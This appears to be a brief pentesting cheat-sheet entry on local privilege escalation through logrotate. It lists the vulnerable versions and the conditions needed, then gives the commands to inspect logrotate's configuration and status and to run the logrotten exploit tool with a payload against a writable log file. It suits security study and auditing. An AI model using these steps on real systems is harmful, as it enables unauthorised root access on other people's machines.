config: /etc/logrotate.conf
/etc/logrotate.conf
To exploit we need following:
we need write permissions on the log file
logrotate must run as a privileged user or root
vulnerable versions: 3.8.6, 3.11.0, 3.15.0, 3.18.0
Check cat /var/lib/logrotate.status to force rotate use -f
cat /var/lib/logrotate.status
-f
Use this exploit with payload as and check which option is used in logrotate.conf with grep "create\|compress" /etc/logrotate.conf | grep -v "#" and run with ./logrotten -p ./payload /tmp/tmp.log where tmp.log is a writable log file
grep "create\|compress" /etc/logrotate.conf | grep -v "#"
./logrotten -p ./payload /tmp/tmp.log
Last updated 2 months ago
